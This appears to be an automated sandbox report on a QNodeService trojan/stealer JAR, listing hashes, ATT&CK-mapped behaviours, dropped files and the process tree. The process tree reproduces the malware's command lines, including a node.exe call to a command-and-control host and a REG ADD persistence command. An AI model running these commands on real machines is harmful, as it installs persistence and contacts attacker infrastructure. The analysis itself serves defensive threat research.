4b62b502ab63d3c23386068954fa7c73.jar

General
Target

4b62b502ab63d3c23386068954fa7c73.jar

Filesize

54KB

Completed

25-11-2020 07:01

Score
10/10
MD5

4b62b502ab63d3c23386068954fa7c73

SHA1

079c3c46af6b94fb838e3382bf0a0628eb636d3b

SHA256

61f755a1b4b17c26aa0a66d6dc16bb346bd2e58b874a0264aa7c135b86444828

Malware Config
Signatures 8

Filter: none

Defense Evasion
Discovery
Persistence
  • QNodeService

    Description

    Trojan/stealer written in NodeJS and spread via Java downloader.

  • Executes dropped EXE
    node.exenode.exenode.exe

    Reported IOCs

    pidprocess
    2284node.exe
    940node.exe
    1332node.exe
  • Adds Run key to start application
    reg.exe

    TTPs

    Registry Run Keys / Startup FolderModify Registry

    Reported IOCs

    descriptioniocprocess
    Key created\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Runreg.exe
    Set value (str)\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\7b7d076e-a6f1-40c6-80da-6e8913d26ac0 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""reg.exe
  • JavaScript code in executable

    Reported IOCs

    resourceyara_rule
    behavioral2/files/0x000100000001ab81-170.datjs
    behavioral2/files/0x000100000001ab81-175.datjs
    behavioral2/files/0x000100000001ab81-179.datjs
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flowioc
    22wtfismyip.com
    21wtfismyip.com
  • Checks processor information in registry
    node.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query RegistrySystem Information Discovery

    Reported IOCs

    descriptioniocprocess
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHznode.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameStringnode.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0node.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHznode.exe
    Key value queried\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameStringnode.exe
    Key opened\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1node.exe
  • Suspicious behavior: EnumeratesProcesses
    node.exenode.exenode.exe

    Reported IOCs

    pidprocess
    2284node.exe
    2284node.exe
    2284node.exe
    2284node.exe
    940node.exe
    940node.exe
    940node.exe
    940node.exe
    1332node.exe
    1332node.exe
    1332node.exe
    1332node.exe
    1332node.exe
    1332node.exe
    1332node.exe
    1332node.exe
    1332node.exe
    1332node.exe
  • Suspicious use of WriteProcessMemory
    java.exejavaw.exenode.exenode.exenode.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 656 wrote to memory of 4080656java.exejavaw.exe
    PID 656 wrote to memory of 4080656java.exejavaw.exe
    PID 4080 wrote to memory of 22844080javaw.exenode.exe
    PID 4080 wrote to memory of 22844080javaw.exenode.exe
    PID 2284 wrote to memory of 9402284node.exenode.exe
    PID 2284 wrote to memory of 9402284node.exenode.exe
    PID 940 wrote to memory of 1332940node.exenode.exe
    PID 940 wrote to memory of 1332940node.exenode.exe
    PID 1332 wrote to memory of 38241332node.execmd.exe
    PID 1332 wrote to memory of 38241332node.execmd.exe
    PID 3824 wrote to memory of 40643824cmd.exereg.exe
    PID 3824 wrote to memory of 40643824cmd.exereg.exe
Processes 7
  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\4b62b502ab63d3c23386068954fa7c73.jar
    Suspicious use of WriteProcessMemory
    PID:656
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\555bab1c.tmp
      Suspicious use of WriteProcessMemory
      PID:4080
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain helpdesk.servebeer.com
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        PID:2284
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_LNfzCu\boot.js --hub-domain helpdesk.servebeer.com
          Executes dropped EXE
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of WriteProcessMemory
          PID:940
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_LNfzCu\boot.js --hub-domain helpdesk.servebeer.com
            Executes dropped EXE
            Checks processor information in registry
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of WriteProcessMemory
            PID:1332
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7b7d076e-a6f1-40c6-80da-6e8913d26ac0" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              Suspicious use of WriteProcessMemory
              PID:3824
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7b7d076e-a6f1-40c6-80da-6e8913d26ac0" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                Adds Run key to start application
                PID:4064
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
        Execution
          Exfiltration
            Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp

                      MD5

                      d90f60d7de79dd385ac5924064d5990c

                      SHA1

                      15d0bb24d7691881c5df0984758dbedab65eedd5

                      SHA256

                      9e594c60f859a967f4bb2b99b77bf5db88856693c80dfb8b4f827b08eca84d67

                      SHA512

                      0842a28bc210f70bd0cb2b761e7571ade8cb2c97f108bd25473f1200dfd0ff943d9b09b9c368c3c487680d0fd6d5fb84050cc52bce17c5d40bf303bda39993e7

                    • C:\Users\Admin\AppData\Local\Temp\555bab1c.tmp

                      MD5

                      4b62b502ab63d3c23386068954fa7c73

                      SHA1

                      079c3c46af6b94fb838e3382bf0a0628eb636d3b

                      SHA256

                      61f755a1b4b17c26aa0a66d6dc16bb346bd2e58b874a0264aa7c135b86444828

                      SHA512

                      10841dca540e8ef0e8e675e6f58ff7c87cfe1caf820a1083e52bfa826823e9ba1282f28735fffee6158319469b9646919166c3fa31e85f52f458b17ebd66150e

                    • C:\Users\Admin\AppData\Local\Temp\_qhub_node_LNfzCu\boot.js

                      MD5

                      3859487feb5152e9d1afc4f8cd320608

                      SHA1

                      7bf154c9ddf3a71abf15906cdb60773e8ae07b62

                      SHA256

                      8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13

                      SHA512

                      826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • C:\Users\Admin\node-v14.12.0-win-x64\node.exe

                      MD5

                      f0b11a5823c45fc2664e116dc0323bcb

                      SHA1

                      612339040c1f927ec62186cd5012f4bb9c53c1b9

                      SHA256

                      16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99

                      SHA512

                      0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

                    • memory/940-176-0x0000026787740000-0x0000026787741000-memory.dmp

                    • memory/940-174-0x0000000000000000-mapping.dmp

                    • memory/1332-180-0x0000026037780000-0x0000026037781000-memory.dmp

                    • memory/1332-178-0x0000000000000000-mapping.dmp

                    • memory/2284-173-0x0000035A8FE00000-0x0000035A8FE01000-memory.dmp

                    • memory/2284-169-0x0000000000000000-mapping.dmp

                    • memory/3824-181-0x0000000000000000-mapping.dmp

                    • memory/4064-182-0x0000000000000000-mapping.dmp

                    • memory/4080-52-0x0000000000000000-mapping.dmp